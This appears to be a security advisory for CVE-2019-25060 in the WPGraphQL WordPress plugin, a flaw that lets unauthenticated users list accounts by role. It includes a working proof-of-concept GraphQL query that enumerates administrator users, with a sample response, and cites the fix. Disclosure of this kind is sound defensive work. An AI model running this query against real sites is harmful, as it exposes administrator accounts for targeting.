Description
The WPGraphQL plugin (v < 0.3.5) doesn’t properly restrict access to information about other users’ roles on the affected wordpress site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site. This has been assigned CVE-2019-25060.
Proof of Concept
- Make this GraphQL call as an unauthenticated user on any wordpress site using this plugin:
1 2 3 4 5 6 7 8 9 10
query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }
The response will be:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
{ "data": { "users": { "edges": [ { "node": { "userId": 1, "name": "root" } } ] } } }
An unauthenticated user is able to determine the users with admin role on the wordpress site. This issue has been fixed at https://github.com/wp-graphql/wp-graphql/pull/900.